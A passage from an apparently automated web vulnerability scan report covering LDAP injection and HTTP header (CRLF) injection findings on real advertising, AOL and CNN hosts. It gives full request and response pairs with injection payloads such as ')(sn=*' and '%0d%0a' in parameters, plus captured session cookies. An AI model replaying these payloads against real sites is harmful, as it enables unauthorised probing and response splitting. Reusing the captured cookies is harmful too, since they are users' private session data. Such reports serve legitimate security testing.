3. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1fe895629ae7659c)(sn=* and 1fe895629ae7659c)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /bmx3/broker.pli?pid=1fe895629ae7659c)(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c)(sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1fe895629ae7659c)!(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c)!(sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. HTTP header injection previous next
There are 79 instances of this issue:

http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://ad.doubleclick.net/getcamphist [src parameter]
http://api.screenname.aol.com/auth/login [devId parameter]
http://api.screenname.aol.com/auth/login [f parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]
http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]
http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]
http://tacoda.at.atwola.com/rtx/r.js [N cookie]
http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dbbe6%0d%0aaea1137f35f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifdbbe6%0d%0aaea1137f35f?557101547 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdbbe6
aea1137f35f:
Date: Thu, 05 May 2011 00:59:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/getcamphist [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 26ba9%0d%0a8501ac1155d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs73546360775362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D5%252F4%252F2011%252012%253A45%253A22%25204%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fitunes.apple.com%252FWebObjects%252FMZStore.woa%252Fwa%252FviewEula%253Fid%253D347839246%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D2%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1022%26bh%3D1007%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D126ba9%0d%0a8501ac1155d&A2S=1;ord=1217103637 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s73546360775362?AQB=1&vvpr=true&&ndh=1&t=5%2F4%2F2011%2012%3A45%3A22%204%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewEula%3Fid%3D347839246&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D2&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1022&bh=1007&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=126ba9
8501ac1155d&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240264641;lastimptime=1304557682;lis=522165;lip=63097682;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5465585.3;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304599550:
Date: Thu, 05 May 2011 12:45:49 GMT
Server: GFE/2.0
Content-Type: text/html

4.3. http://api.screenname.aol.com/auth/login [devId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.screenname.aol.com
Path:	/auth/login

Issue detail

The value of the devId request parameter is copied into the Location response header. The payload d807c%0d%0af48a51c2172 was submitted in the devId parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=d807c%0d%0af48a51c2172&f=qs&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:45 GMT
Set-Cookie: JSESSIONID=357BE1B712C7CBD42E688AD1F49F1367; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=d807c
f48a51c2172&f=qs
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=454
Connection: Keep-Alive

4.4. http://api.screenname.aol.com/auth/login [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.screenname.aol.com
Path:	/auth/login

Issue detail

The value of the f request parameter is copied into the Location response header. The payload b288d%0d%0a423203780bc was submitted in the f parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d%0d%0a423203780bc&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:46 GMT
Set-Cookie: JSESSIONID=B4961C5905C7619F69B7FF973CC99CCB; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d
423203780bc
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=478
Connection: Keep-Alive

4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 7311c%0d%0a5371b4a8ad4 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=7311c%0d%0a5371b4a8ad4&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=92e362f3-0c29-4bfc-89bf-3b975bf183723HX0c0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=7311c
5371b4a8ad4&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0

4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 83642%0d%0aa73a02d7dd9 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=83642%0d%0aa73a02d7dd9 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
